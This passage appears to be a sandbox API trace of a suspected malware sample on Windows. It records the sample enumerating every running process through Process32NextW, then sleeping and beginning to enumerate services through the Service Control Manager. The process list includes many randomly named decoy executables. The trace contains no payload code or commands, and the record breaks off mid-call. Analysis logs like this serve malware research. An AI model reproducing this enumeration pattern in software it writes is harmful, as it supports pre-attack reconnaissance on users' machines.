dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.695] lstrlenW (lpString="csrss.exe") returned 9 [0214.695] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0214.695] lstrlenW (lpString="wininit.exe") returned 11 [0214.695] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0214.696] lstrlenW (lpString="csrss.exe") returned 9 [0214.696] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0214.697] lstrlenW (lpString="winlogon.exe") returned 12 [0214.697] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0214.859] lstrlenW (lpString="services.exe") returned 12 [0214.859] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0214.859] lstrlenW (lpString="lsass.exe") returned 9 [0214.860] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.861] lstrlenW (lpString="svchost.exe") returned 11 [0214.861] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0214.862] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0214.862] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0214.863] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0214.863] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.864] lstrlenW (lpString="svchost.exe") returned 11 [0214.864] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0214.865] lstrlenW (lpString="dwm.exe") returned 7 [0214.865] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.866] lstrlenW (lpString="svchost.exe") returned 11 [0214.866] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.867] lstrlenW (lpString="svchost.exe") returned 11 [0214.867] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.868] lstrlenW (lpString="svchost.exe") returned 11 [0214.868] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.869] lstrlenW (lpString="svchost.exe") returned 11 [0214.869] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.908] lstrlenW (lpString="svchost.exe") returned 11 [0214.908] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.909] lstrlenW (lpString="svchost.exe") returned 11 [0214.909] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.910] lstrlenW (lpString="svchost.exe") returned 11 [0214.910] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.911] lstrlenW (lpString="svchost.exe") returned 11 [0214.911] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.911] lstrlenW (lpString="svchost.exe") returned 11 [0214.911] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0214.912] lstrlenW (lpString="spoolsv.exe") returned 11 [0214.912] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.913] lstrlenW (lpString="svchost.exe") returned 11 [0214.913] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.914] lstrlenW (lpString="svchost.exe") returned 11 [0214.914] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0214.914] lstrlenW (lpString="audiodg.exe") returned 11 [0214.914] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0214.915] lstrlenW (lpString="sihost.exe") returned 10 [0214.915] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.916] lstrlenW (lpString="svchost.exe") returned 11 [0214.916] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0214.917] lstrlenW (lpString="taskhostw.exe") returned 13 [0214.917] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0214.917] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0214.917] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0214.918] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0214.918] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0214.919] lstrlenW (lpString="explorer.exe") returned 12 [0214.919] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0214.920] lstrlenW (lpString="Memory Compression") returned 18 [0214.920] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0214.920] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0214.920] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0214.921] lstrlenW (lpString="SearchUI.exe") returned 12 [0214.921] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0214.922] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0214.922] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.923] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0214.923] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0214.923] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0214.923] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0214.924] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0214.924] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0214.925] lstrlenW (lpString="conhost.exe") returned 11 [0214.925] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0214.925] lstrlenW (lpString="roof competitive.exe") returned 20 [0214.926] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0214.926] lstrlenW (lpString="trustees.exe") returned 12 [0214.926] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0214.927] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0214.927] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0214.928] lstrlenW (lpString="isbn.exe") returned 8 [0214.928] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0214.928] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0214.928] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0214.929] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0214.929] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0214.930] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0214.930] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0214.931] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0214.931] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0214.971] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0214.971] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0214.972] lstrlenW (lpString="playstation iraq.exe") returned 20 [0214.972] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0214.973] lstrlenW (lpString="harbor.exe") returned 10 [0214.973] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0214.974] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0214.974] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0214.975] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0214.975] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0214.976] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0214.976] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0214.976] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0214.976] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0214.977] lstrlenW (lpString="larent.exe") returned 10 [0214.977] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0214.978] lstrlenW (lpString="stereo.exe") returned 10 [0214.978] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0214.980] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0214.980] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0214.981] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0214.981] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0214.982] lstrlenW (lpString="state.exe") returned 9 [0214.982] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0214.983] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0214.983] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.983] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0214.983] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0214.984] lstrlenW (lpString="taskhostw.exe") returned 13 [0214.984] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0214.985] lstrlenW (lpString="sppsvc.exe") returned 10 [0214.985] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.986] lstrlenW (lpString="svchost.exe") returned 11 [0214.986] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0214.987] lstrlenW (lpString="Pg.exe") returned 6 [0214.987] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0214.988] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0214.988] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0214.988] lstrlenW (lpString="conhost.exe") returned 11 [0214.988] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0214.989] lstrlenW (lpString="cmd.exe") returned 7 [0214.989] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0214.990] lstrlenW (lpString="conhost.exe") returned 11 [0214.990] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0214.991] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0214.991] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0214.992] lstrlenW (lpString="conhost.exe") returned 11 [0214.992] Process32NextW (in: hSnapshot=0x450, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0214.992] CloseHandle (hObject=0x450) returned 1 [0214.992] Sleep (dwMilliseconds=0x1f4) [0215.494] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236b968 [0215.495] EnumServicesStatusExW (in: hSCManager=0x236b968, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, 